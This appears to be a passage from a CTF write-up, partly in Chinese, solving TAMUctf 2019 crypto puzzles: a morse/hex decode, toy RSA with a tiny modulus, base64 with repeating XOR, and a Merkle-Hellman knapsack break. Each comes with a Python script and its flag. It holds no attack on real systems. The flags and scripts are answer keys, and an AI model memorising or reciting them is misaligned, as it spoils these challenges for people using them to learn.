di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-dah-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah di-di-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-dah di-di-di-di-dah dah-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-dah-dit di-di-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dah dah-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit dah-di-dit dah-dah-di-di-dit dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-dah-dah-dah dah-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dit di-di-di-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-dah-dah di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-dah dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dit di-di-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah dah-dah-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-dah di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-dah-dah-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit di-dah di-di-dah-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dah di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dah dit di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-di-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dit di-dah di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-dah di-di-di-dah-dah di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-dah-dah dah-dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah dah-dah-dah-dah-dit"
cipher=cipher.replace('-','').replace('dit','.').replace('di','.').replace('dah','-')
print morse(cipher)
# 0x57702a6c58744751386538716e6d4d59552a737646486b6a49742a5251264a705a766a6d2125254b446b6670235e4e39666b346455346c423372546f5430505a516d4351454b5942345a4d762a21466b386c25626a716c504d6649476d612525467a4720676967656d7b433169634b5f636c31434b2d7930755f683476335f6d3449317d20757634767a4b5a7434796f6d694453684c6d385145466e5574774a404e754f59665826387540476e213125547176305663527a56216a217675757038426a644e49714535772324255634555a4f595a327a37543235743726784c40574f373431305149
# use https://findneo.github.io/kt/tools.html#conv/ to convert hex to string
# gigem{C1icK_cl1CK-y0u_h4v3_m4I1}

RSAaaay

Hey, you’re a hacker, right? I think I am too, look at what I made!


1
2
> (2531257, 43)
>

My super secret message: 906851 991083 1780304 2380434 438490 356019 921472 822283 817856 556932 2102538 2501908 2211404 991083 1562919 38268


Problem is, I don’t remember how to decrypt it… could you help me out?

Difficulty: easy

solve.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import gmpy2
n=2531257
e=43
cc=[906851 ,991083 ,1780304 ,2380434 ,438490 ,356019 ,921472 ,822283 ,817856, 556932 ,2102538 ,2501908, 2211404 ,991083 ,1562919 ,38268]

p,q=509,4973
assert(p*q==n)
phi=(p-1)*(q-1)
d=gmpy2.invert(e,phi)
assert(e*d%phi==1)
mm=''.join([str(int(pow(c,d,n))) for c in cc])
print mm #103105103101109123839711897103101958310512095701081211051101039584105103101114115125

mm=[103,105,103,101,109,123,83,97,118,97,103,101,95,83,105,120,95,70,108,121,105,110,103,95,84,105,103,101,114,115,125]
print ''.join([chr(m) for m in mm])
# gigem{Savage_Six_Flying_Tigers}

:)

Look at what I found! XUBdTFdScw5XCVRGTglJXEpMSFpOQE5AVVxJBRpLT10aYBpIVwlbCVZATl1WTBpaTkBOQFVcSQdH

Difficulty: easy

直接base64解码没有可打印字符。已知flag前几个字符为gigem{,尝试base64解码后内容和gigem逐字节异或得到:):): ,发现规律。

solve.py

1
2
3
4
5
6
7
import base64,itertools
data=base64.b64decode("XUBdTFdScw5XCVRGTglJXEpMSFpOQE5AVVxJBRpLT10aYBpIVwlbCVZATl1WTBpaTkBOQFVcSQdH")
flag_format="gigem{"
print ''.join(chr(ord(a)^ord(b))for a,b in zip(flag_format,data))
# :):):)
print(''.join(chr(ord(a)^ord(b)) for a,b in zip(data, itertools.cycle(':)'))))
# gigem{I'm not superstitious, but I am a little stitious.}

zip和itertools.cycle用法如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
zip(seq1 [, seq2 [...]]) -> [(seq1[0], seq2[0] ...), (...)]
param seq1

Return a list of tuples, where each tuple contains the i-th element
from each of the argument sequences. The returned list is truncated
in length to the length of the shortest argument sequence.

-------

cycle(iterable) --> cycle object
param iterable

Return elements from the iterable until it is exhausted.
Then repeat the sequence indefinitely.

另外有一个不错的工具(https://gchq.github.io/CyberChef/#recipe=Magic(3,true,false,'')&input=WFVCZFRGZFNjdzVYQ1ZSR1RnbEpYRXBNU0ZwT1FFNUFWVnhKQlJwTFQxMGFZQnBJVndsYkNWWkFUbDFXVEJwYVRrQk9RRlZjU1FkSA) 可以尝试检查数据可能的格式。

Holey Knapsack

My knapsack has a hole in it

Cipher text: 11b90d6311b90ff90ce610c4123b10c40ce60dfa123610610ce60d450d000ce61061106110c4098515340d4512361534098509270e5d09850e58123610c9

Public key: {99, 1235, 865, 990, 5, 1443, 895, 1477}

The flag is slightly off format.

Difficulty: medium

是著名的和RSA同年发布的公钥加密系统 Merkle-Hellman Public Key Cryptosystem ,是Knapsack cryptosystems 之一,已被破解。 参见https://www.nevivur.net/writeups/2019/02/tamuctf-19/#holey-knapsack

解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/usr/bin/env python3

pkey = [99, 1235, 865, 990, 5, 1443, 895, 1477]
ctext = '11b90d6311b90ff90ce610c4123b10c40ce60dfa123610610ce60d450d000ce61061106110c4098515340d4512361534098509270e5d09850e58123610c9'

mapping = dict()
for c in range(256):
enc = 0
for i in range(8):
if c&(1<<i):
enc += pkey[i]
mapping[hex(enc)[2:]] = chr(c)

d = ''
while ctext:
if not d and ctext[0] == '0':
ctext = ctext[1:]
d += ctext[0]
ctext = ctext[1:]

if d in mapping:
print mapping[d],
d = ''

# g i g _ e m { m e r k l e - h e l l m a n - k n a p s a c k }

参考链接